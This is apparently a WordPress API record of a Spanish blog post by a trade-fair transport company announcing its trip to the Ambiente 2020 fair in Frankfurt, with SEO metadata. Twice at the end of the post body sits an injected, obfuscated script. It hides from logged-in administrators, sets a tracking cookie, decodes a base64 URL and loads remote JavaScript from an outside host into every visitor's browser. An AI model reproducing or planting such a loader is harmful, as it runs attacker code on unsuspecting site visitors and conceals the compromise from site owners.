{"id":1431,"date":"2020-12-04T13:02:39","date_gmt":"2020-12-04T11:02:39","guid":{"rendered":"http:\/\/www.weservices.es\/?p=1431"},"modified":"2026-04-27T10:11:54","modified_gmt":"2026-04-27T10:11:54","slug":"feria-ambiente-2020-frankfurt","status":"publish","type":"post","link":"https:\/\/weservices.es\/en\/feria-ambiente-2020-frankfurt\/","title":{"rendered":"[:es]Feria Ambiente 2020 Frankfurt[:]"},"content":{"rendered":"<p>[:es]Ya estamos preparados para nuestra cita en Frankfurt!<\/p>\n<p>We services viajar\u00e1 para poder dar soporte a nuestros clientes y que puedan tener todo su equipo listo para exponer.<\/p>\n<p class=\"noticias\">La feria Ambiente de Frankfurt se prepara ya para una nueva edici\u00f3n. En total, 4.500 expositores expondr\u00e1n las \u00faltimas novedades en las tres secciones en las que se estructura la feria: \u201cDining\u201d con productos para la mesa, cocina y menaje; \u201cLiving\u201d, dedicada al sector del mueble y accesorios de decoraci\u00f3n e interiorismo, y \u201cGiving\u201d con art\u00edculos de regalo, joyer\u00eda, relojer\u00eda y bisuter\u00eda, marroquiner\u00eda, productos de belleza, bienestar y moda.<\/p>\n<p class=\"noticias\">El evento ofrecer\u00e1 simult\u00e1neamente un gran n\u00famero de actividades paralelas, tales como conferencias, programas para el fomento de j\u00f3venes talentos, escenificaciones de tendencias y entregas de premios.<\/p>\n<p>[:]<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>[:es]Ya estamos preparados para nuestra cita en Frankfurt! We services viajar\u00e1 para poder dar soporte a nuestros clientes y que puedan tener todo su equipo listo para exponer. La feria Ambiente de Frankfurt se prepara ya para una nueva edici\u00f3n. En total, 4.500 expositores expondr\u00e1n las \u00faltimas novedades en las tres secciones en las que [&hellip;]<\/p>","protected":false},"author":2,"featured_media":1433,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v22.3 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>[:es]Feria Ambiente 2020 Frankfurt[:] - We Services<\/title>\n<meta name=\"description\" content=\"Ya estamos preparados para nuestra cita en Frankfurt! We services viajar\u00e1 para poder dar soporte a nuestros clientes y que puedan tener todo su equipo\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/weservices.es\/en\/feria-ambiente-2020-frankfurt\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"[:es]Feria Ambiente 2020 Frankfurt[:] - We Services\" \/>\n<meta property=\"og:description\" content=\"Ya estamos preparados para nuestra cita en Frankfurt! We services viajar\u00e1 para poder dar soporte a nuestros clientes y que puedan tener todo su equipo\" \/>\n<meta property=\"og:url\" content=\"https:\/\/weservices.es\/en\/feria-ambiente-2020-frankfurt\/\" \/>\n<meta property=\"og:site_name\" content=\"We Services\" \/>\n<meta property=\"article:published_time\" content=\"2020-12-04T11:02:39+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-04-27T10:11:54+00:00\" \/>\n<meta name=\"author\" content=\"JOSE ANTONIO GARCIA SANCHEZ\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"JOSE ANTONIO GARCIA SANCHEZ\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/weservices.es\/feria-ambiente-2020-frankfurt\/\",\"url\":\"https:\/\/weservices.es\/feria-ambiente-2020-frankfurt\/\",\"name\":\"[:es]Feria Ambiente 2020 Frankfurt[:] - We Services\",\"isPartOf\":{\"@id\":\"https:\/\/weservices.es\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/weservices.es\/feria-ambiente-2020-frankfurt\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/weservices.es\/feria-ambiente-2020-frankfurt\/#primaryimage\"},\"thumbnailUrl\":\"\",\"datePublished\":\"2020-12-04T11:02:39+00:00\",\"dateModified\":\"2026-04-27T10:11:54+00:00\",\"author\":{\"@id\":\"https:\/\/weservices.es\/#\/schema\/person\/af068a5b48ce3b53d759cef6930c673b\"},\"description\":\"Ya estamos preparados para nuestra cita en Frankfurt! We services viajar\u00e1 para poder dar soporte a nuestros clientes y que puedan tener todo su equipo\",\"breadcrumb\":{\"@id\":\"https:\/\/weservices.es\/feria-ambiente-2020-frankfurt\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/weservices.es\/feria-ambiente-2020-frankfurt\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/weservices.es\/feria-ambiente-2020-frankfurt\/#primaryimage\",\"url\":\"\",\"contentUrl\":\"\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/weservices.es\/feria-ambiente-2020-frankfurt\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\/\/weservices.es\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"[:es]Feria Ambiente 2020 Frankfurt[:]\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/weservices.es\/#website\",\"url\":\"https:\/\/weservices.es\/\",\"name\":\"We Services\",\"description\":\"Transport for fairs and events\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/weservices.es\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/weservices.es\/#\/schema\/person\/af068a5b48ce3b53d759cef6930c673b\",\"name\":\"JOSE ANTONIO GARCIA SANCHEZ\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/weservices.es\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/caf6e28e6b0db890830baec9989dbcd3?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/caf6e28e6b0db890830baec9989dbcd3?s=96&d=mm&r=g\",\"caption\":\"JOSE ANTONIO GARCIA SANCHEZ\"},\"url\":\"https:\/\/weservices.es\/en\/author\/jo\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"[:es]Feria Ambiente 2020 Frankfurt[:] - We Services","description":"Ya estamos preparados para nuestra cita en Frankfurt! We services viajar\u00e1 para poder dar soporte a nuestros clientes y que puedan tener todo su equipo","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/weservices.es\/en\/feria-ambiente-2020-frankfurt\/","og_locale":"en_US","og_type":"article","og_title":"[:es]Feria Ambiente 2020 Frankfurt[:] - We Services","og_description":"Ya estamos preparados para nuestra cita en Frankfurt! We services viajar\u00e1 para poder dar soporte a nuestros clientes y que puedan tener todo su equipo","og_url":"https:\/\/weservices.es\/en\/feria-ambiente-2020-frankfurt\/","og_site_name":"We Services","article_published_time":"2020-12-04T11:02:39+00:00","article_modified_time":"2026-04-27T10:11:54+00:00","author":"JOSE ANTONIO GARCIA SANCHEZ","twitter_card":"summary_large_image","twitter_misc":{"Written by":"JOSE ANTONIO GARCIA SANCHEZ","Est. reading time":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/weservices.es\/feria-ambiente-2020-frankfurt\/","url":"https:\/\/weservices.es\/feria-ambiente-2020-frankfurt\/","name":"[:es]Feria Ambiente 2020 Frankfurt[:] - We Services","isPartOf":{"@id":"https:\/\/weservices.es\/#website"},"primaryImageOfPage":{"@id":"https:\/\/weservices.es\/feria-ambiente-2020-frankfurt\/#primaryimage"},"image":{"@id":"https:\/\/weservices.es\/feria-ambiente-2020-frankfurt\/#primaryimage"},"thumbnailUrl":"","datePublished":"2020-12-04T11:02:39+00:00","dateModified":"2026-04-27T10:11:54+00:00","author":{"@id":"https:\/\/weservices.es\/#\/schema\/person\/af068a5b48ce3b53d759cef6930c673b"},"description":"Ya estamos preparados para nuestra cita en Frankfurt! We services viajar\u00e1 para poder dar soporte a nuestros clientes y que puedan tener todo su equipo","breadcrumb":{"@id":"https:\/\/weservices.es\/feria-ambiente-2020-frankfurt\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/weservices.es\/feria-ambiente-2020-frankfurt\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/weservices.es\/feria-ambiente-2020-frankfurt\/#primaryimage","url":"","contentUrl":""},{"@type":"BreadcrumbList","@id":"https:\/\/weservices.es\/feria-ambiente-2020-frankfurt\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/weservices.es\/"},{"@type":"ListItem","position":2,"name":"[:es]Feria Ambiente 2020 Frankfurt[:]"}]},{"@type":"WebSite","@id":"https:\/\/weservices.es\/#website","url":"https:\/\/weservices.es\/","name":"We Services","description":"Transport for fairs and events","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/weservices.es\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/weservices.es\/#\/schema\/person\/af068a5b48ce3b53d759cef6930c673b","name":"JOSE ANTONIO GARCIA SANCHEZ","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/weservices.es\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/caf6e28e6b0db890830baec9989dbcd3?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/caf6e28e6b0db890830baec9989dbcd3?s=96&d=mm&r=g","caption":"JOSE ANTONIO GARCIA SANCHEZ"},"url":"https:\/\/weservices.es\/en\/author\/jo\/"}]}},"_links":{"self":[{"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/posts\/1431"}],"collection":[{"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/comments?post=1431"}],"version-history":[{"count":2,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/posts\/1431\/revisions"}],"predecessor-version":[{"id":3132,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/posts\/1431\/revisions\/3132"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/weservices.es\/en\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/media?parent=1431"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/categories?post=1431"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/weservices.es\/en\/wp-json\/wp\/v2\/tags?post=1431"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}